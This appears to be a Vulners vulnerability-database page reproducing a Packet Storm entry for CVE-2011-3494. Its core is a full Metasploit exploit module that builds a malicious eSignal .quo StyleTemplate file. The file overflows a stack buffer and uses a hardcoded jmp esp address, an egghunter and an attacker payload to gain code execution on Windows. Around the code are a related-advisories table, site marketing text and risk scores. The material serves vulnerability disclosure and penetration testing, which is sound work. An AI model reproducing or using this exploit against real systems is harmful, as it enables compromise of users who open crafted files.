Vulners
Lucene search
eSignal / eSignal Pro 10.6.2425.1208 Buffer Overflow
🗓️ 29 Sep 2011 00:00:00Reported by Luigi AuriemmaType 
packetstorm🔗 packetstormsecurity.com👁 38 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2011-3494 | 20 Sep 201100:00 | – | circl |
 | Interactive Data eSignal Stack Buffer Overflow (CVE-2011-3494) | 26 Mar 201200:00 | – | checkpoint_advisories |
 | CVE-2011-3494 | 16 Sep 201114:00 | – | cve |
 | CVE-2011-3494 | 16 Sep 201114:00 | – | cvelist |
 | eSignal and eSignal Pro File Parsing Buffer Overflow in QUO | 20 Sep 201117:39 | – | metasploit |
 | CVE-2011-3494 | 16 Sep 201114:28 | – | nvd |
 | eSignal Multiple Vulnerabilities | 16 Sep 201100:00 | – | openvas |
| eSignal Multiple Vulnerabilities | 16 Sep 201100:00 | – | openvas |
 | Heap overflow | 16 Sep 201114:28 | – | prion |
 | CVE-2011-3494 | 22 May 202509:57 | – | redhatcve |
10
`##
# $Id: esignal_styletemplate_bof.rb 13768 2011-09-21 11:55:56Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO',
'Description' => %q{
The software is unable to handle the "<StyleTemplate>" files (even
those original included in the program) like those with the registered
extensions QUO, SUM and POR. Successful exploitation of this vulnerability
may take up to several seconds due to the use of egghunter. Also, DEP
bypass is unlikely due to the limited space for payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Original discovery
'TecR0c <tecr0c[at]tecninja.net>', # msf
'mr_me <steventhomasseeley[at]gmai.com>', # msf
],
'Version' => '$Revision: 13768 $',
'References' =>
[
[ 'CVE', '2011-3494' ],
[ 'OSVDB', '75456' ],
[ 'BID', '49600' ],
[ 'URL', 'http://aluigi.altervista.org/adv/esignal_1-adv.txt' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17837/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00"
},
'Targets' =>
[
[
'Win XP SP3 / Windows Vista / Windows 7',
{
'Ret' => 0x7c206fef, # jmp esp MFC71.dll v10.6.2425.1208
'Offset' => 54
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Sep 06 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.quo']),
], self.class)
end
def exploit
eggoptions =
{
:checksum => false,
:eggtag => 'eggz'
}
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
buffer = rand_text_alpha(target['Offset'])
buffer << [target.ret].pack('V')
buffer << rand_text_alpha_upper(4)
buffer << hunter
buffer << rand_text_alpha_upper(1500)
buffer << egg
file = "<StyleTemplate>\r\n"
file << "#{buffer}\r\n"
file << "</StyleTemplate>\r\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(file)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Sep 2011 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.77849